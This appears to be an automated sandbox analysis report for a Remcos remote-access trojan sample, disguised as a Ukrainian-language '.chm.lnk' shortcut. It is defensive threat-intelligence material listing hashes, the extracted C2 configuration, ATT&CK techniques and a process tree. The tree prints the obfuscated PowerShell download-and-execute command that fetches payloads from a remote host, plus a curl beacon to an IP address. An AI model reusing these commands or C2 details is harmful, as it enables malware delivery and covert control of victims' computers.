remcos | 2e7aa640b2da6d9350afba1b8ad0b65bc85ac335dde42f08cd540da8580e2a78

General

Target

Форма претензії.chm.lnk
Size

22KB
MD5

0c1eb2f8168941dc911360995e8b200c
SHA1

cf7debc68f2fb503b92089b3dd1c065b93352854
SHA256

2e7aa640b2da6d9350afba1b8ad0b65bc85ac335dde42f08cd540da8580e2a78
SHA512

22a1ae8ab098e17cc0a7ae307477e11b291fb9668caff28f77a087a6a9f17dcbf2190d970efdda74476177575e43fa0f5d67e433ea8310b6b7d161ae062994c0
SSDEEP

24:8znbWJoDyRu6Knk1WTjA+PWaKBxKV67wTyn68A07aYVFab/Bne8m:8wnR0kogCKBMVtTynw07LFabBne8

Score

10^/10

remcos idelural rat

Malware Config

Extracted

Family

remcos

Botnet

idelural

C2

the-new-age.co.ua:443

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
10
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-N0TOHG
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	4432	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 3 IoCs

pid	Process
5040	securitycheck.exe
2236	identity_helper.exe
3324	identity_helper.exe

Loads dropped DLL 2 IoCs

pid	Process
2236	identity_helper.exe
3324	identity_helper.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3324 set thread context of 2164	3324	identity_helper.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4432	powershell.exe
4432	powershell.exe
5040	securitycheck.exe
5040	securitycheck.exe
2236	identity_helper.exe
3324	identity_helper.exe
3324	identity_helper.exe
2164	cmd.exe
2164	cmd.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3324	identity_helper.exe
2164	cmd.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4432	powershell.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 4432	2372	cmd.exe	86
PID 2372 wrote to memory of 4432	2372	cmd.exe	86
PID 4432 wrote to memory of 5040	4432	powershell.exe	92
PID 4432 wrote to memory of 5040	4432	powershell.exe	92
PID 4432 wrote to memory of 5040	4432	powershell.exe	92
PID 5040 wrote to memory of 2236	5040	securitycheck.exe	95
PID 5040 wrote to memory of 2236	5040	securitycheck.exe	95
PID 2236 wrote to memory of 3324	2236	identity_helper.exe	96
PID 2236 wrote to memory of 3324	2236	identity_helper.exe	96
PID 3324 wrote to memory of 2164	3324	identity_helper.exe	97
PID 3324 wrote to memory of 2164	3324	identity_helper.exe	97
PID 3324 wrote to memory of 2164	3324	identity_helper.exe	97
PID 3324 wrote to memory of 2164	3324	identity_helper.exe	97
PID 2164 wrote to memory of 4364	2164	cmd.exe	104
PID 2164 wrote to memory of 4364	2164	cmd.exe	104
PID 2164 wrote to memory of 4364	2164	cmd.exe	104
PID 2164 wrote to memory of 4364	2164	cmd.exe	104
PID 4364 wrote to memory of 1816	4364	explorer.exe	105
PID 4364 wrote to memory of 1816	4364	explorer.exe	105
PID 4364 wrote to memory of 1816	4364	explorer.exe	105
PID 1816 wrote to memory of 4640	1816	WScript.exe	106
PID 1816 wrote to memory of 4640	1816	WScript.exe	106
PID 1816 wrote to memory of 4640	1816	WScript.exe	106
PID 4640 wrote to memory of 2000	4640	cmd.exe	108
PID 4640 wrote to memory of 2000	4640	cmd.exe	108
PID 4640 wrote to memory of 2000	4640	cmd.exe	108
PID 2164 wrote to memory of 4364	2164	cmd.exe	104

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Форма претензії.chm.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden echo 21; &(Get-Command in***********e-webr*) -uri http://i-like-hokku.co.ua/securitycheck.exe -OutFile securitycheck.exe; start securitycheck.exe ; &(Get-Command in**********************e-webre*) -uri http://i-like-hokku.co.ua/sud/dvs.exe -OutFile dvs.exe; start dvs.exe
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4432
- - C:\Users\Admin\AppData\Roaming\securitycheck.exe
    "C:\Users\Admin\AppData\Roaming\securitycheck.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:5040
  - - C:\Users\Admin\AppData\Local\Temp\EpServer_dbg\identity_helper.exe
      C:\Users\Admin\AppData\Local\Temp\EpServer_dbg\identity_helper.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2236
    - - C:\Users\Admin\AppData\Roaming\EpServer_dbg\identity_helper.exe
        
        C:\Users\Admin\AppData\Roaming\EpServer_dbg\identity_helper.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:3324
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2164
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        7⤵
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4364
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check.vbs"
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1816
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/virustotalsuckmycock?id=LQHDAPZK
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:4640
        
        C:\Windows\SysWOW64\curl.exe
        
        curl http://94.156.66.107:9000/hooks/virustotalsuckmycock?id=LQHDAPZK
        10⤵
        
        PID:2000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\EpServer_dbg\bluegill.swf

Filesize
944KB

MD5
59a68c02285ebd01654baa29f3b3a805

SHA1
8e1f4623384b1a7e38a1e4a7930acfe8d97f312e

SHA256
91dbd733caa7de795391fac15171ebaf98c2e49c1e714a45a1af8ea9341a79db

SHA512
c7b3fcde8c6ba5bc353e6404f7f70c710fd00d28a850ad826a7606a64095196077a1fb40b01709bdbd636c18fc3f24615019cdb9109208d92bba66c6f65c89b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\EpServer_dbg\honorarium.app

Filesize
46KB

MD5
9f0407b644889bce12bd90af95ed8774

SHA1
fc87a57137229c61e90346f15c3d7c86db8e9fe9

SHA256
9d8daa473314c210f8ddddc4472e54b941c99d12d37d9f00f4f82c758dd0e192

SHA512
2466a921fd60a970a03f77446a7a289f16a9d71265d40f517491dfc478d3eeb39636ae6edcc71aaa3ee5fda8671f73a011b839a800644dff1eb5738eb61124c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\EpServer_dbg\identity_helper.exe

Filesize
1.1MB

MD5
f975a2d83d63a473fa2fc5206b66bb79

SHA1
e49d21f112ab27ae0953aff30ae122440cf164b9

SHA256
6a2d3876003f6c68f824df4f0033564d8c230716908ba2e6c06ea1dd6d5f98e8

SHA512
4af4ce56bf131432d488ed112f8858c1e1392d013c6ac0603f2fd70ed513091e35854c0f678efeab7fa9a551517c6b9698f40a92729112de4b852fa3c0c69d64

Download Submit
C:\Users\Admin\AppData\Local\Temp\EpServer_dbg\msedge_elf.dll

Filesize
3.9MB

MD5
cf07ac3592e671961058152b0269e8ed

SHA1
5f300b83878190d1212a83faf48d020de6c59909

SHA256
c14b2fd0df724968524ccbf4d04c6dddc9d3b9e615fcf50e2b82d0afa962e412

SHA512
ea5f6b011ccdb731aed24c4adfa5a151adc839d70bd0c6b0bf37d03c6029ad4a8e17ba12cccbc8649dd3de9ad74b40ad578a26b652b964e6dd91914590ad77f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zixuj10a.21o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a7a3f597

Filesize
1.2MB

MD5
540417c7695d660991225affc9fbb063

SHA1
3148543840f53e2431d96cebd83c8ff1bb70c16b

SHA256
2350b4982987f2bb935ee5992496a81d70453e91014e62f7aad7cddb1212eb19

SHA512
6e721bb9079efee947a89df4d9caa9c426a6962d93b1e45e430fbdfc16a0fb2c1b360b513408c042f4a8cc1bc8d204afc615a0aef7471d59e87d17b7b695e10c

Download Submit
C:\Users\Admin\AppData\Local\Temp\check.vbs

Filesize
160B

MD5
ae8753eb397d9017138c50cb457793ce

SHA1
5127583c4a39943dff491835204449d85b8c6f25

SHA256
f70428cbe9fb4170121b11fcca3ed0b00668b31348231ee369c700bd37d81e8d

SHA512
51dc599cf0a937996a9cc527dfaa971a11b38d6485bc1d175092a3496d3644ea870a67dbe95fbf09104eb20cd4e29d77cb745cc8f80f60ede6e55fb62258b7f8

Download Submit
C:\Users\Admin\AppData\Roaming\securitycheck.exe

Filesize
1.1MB

MD5
cb4c21ab082d4acc4712089f4cd517b8

SHA1
7d46bc7ad10c7fba5c9fa982eb19b96f9278d5d5

SHA256
e72f17d6111a1a7b814f0b10a708b7e5edadb990f19b6dc95014b65a8dd2d144

SHA512
52fb1180b986342705f36d81901887f1f05dabd058cd37e056044e6a5334551aaa5607599fe56952f86fb30696ed2b227ba94df081b7583848dd6946660709a2

Download Submit
memory/2164-76-0x0000000074CD0000-0x0000000074E4B000-memory.dmp

Filesize
1.5MB

Download
memory/2164-73-0x00007FFFBFAF0000-0x00007FFFBFCE5000-memory.dmp

Filesize
2.0MB

Download
memory/2164-75-0x0000000074CD0000-0x0000000074E4B000-memory.dmp

Filesize
1.5MB

Download
memory/2164-78-0x0000000074CD0000-0x0000000074E4B000-memory.dmp

Filesize
1.5MB

Download
memory/2236-55-0x00007FFFA1C70000-0x00007FFFA1DE2000-memory.dmp

Filesize
1.4MB

Download
memory/3324-70-0x00007FFFA1C70000-0x00007FFFA1DE2000-memory.dmp

Filesize
1.4MB

Download
memory/3324-68-0x00007FFFA1C70000-0x00007FFFA1DE2000-memory.dmp

Filesize
1.4MB

Download
memory/3324-67-0x00007FFFA1C70000-0x00007FFFA1DE2000-memory.dmp

Filesize
1.4MB

Download
memory/4364-80-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-89-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-96-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-95-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-94-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-93-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-92-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-91-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-90-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-88-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-83-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4364-82-0x0000000000E60000-0x0000000001293000-memory.dmp

Filesize
4.2MB

Download
memory/4364-79-0x00007FFFBFAF0000-0x00007FFFBFCE5000-memory.dmp

Filesize
2.0MB

Download
memory/4432-32-0x00000163CF520000-0x00000163CF530000-memory.dmp

Filesize
64KB

Download
memory/4432-12-0x00007FFFA1620000-0x00007FFFA20E1000-memory.dmp

Filesize
10.8MB

Download
memory/4432-14-0x00000163CF520000-0x00000163CF530000-memory.dmp

Filesize
64KB

Download
memory/4432-30-0x00000163D2100000-0x00000163D28A6000-memory.dmp

Filesize
7.6MB

Download
memory/4432-11-0x00000163D15D0000-0x00000163D15F2000-memory.dmp

Filesize
136KB

Download
memory/4432-35-0x00007FFFA1620000-0x00007FFFA20E1000-memory.dmp

Filesize
10.8MB

Download
memory/4432-13-0x00000163CF520000-0x00000163CF530000-memory.dmp

Filesize
64KB

Download
memory/5040-47-0x0000000073CB0000-0x0000000073E2B000-memory.dmp

Filesize
1.5MB

Download
memory/5040-29-0x0000000000340000-0x0000000000465000-memory.dmp

Filesize
1.1MB

Download
memory/5040-69-0x0000000073CB0000-0x0000000073E2B000-memory.dmp

Filesize
1.5MB

Download
memory/5040-36-0x0000000073CB0000-0x0000000073E2B000-memory.dmp

Filesize
1.5MB

Download
memory/5040-37-0x00007FFFBFAF0000-0x00007FFFBFCE5000-memory.dmp

Filesize
2.0MB

Download
memory/5040-39-0x0000000073CB0000-0x0000000073E2B000-memory.dmp

Filesize
1.5MB

Download
memory/5040-42-0x0000000073CB0000-0x0000000073E2B000-memory.dmp

Filesize
1.5MB

Download

Analysis

Sharing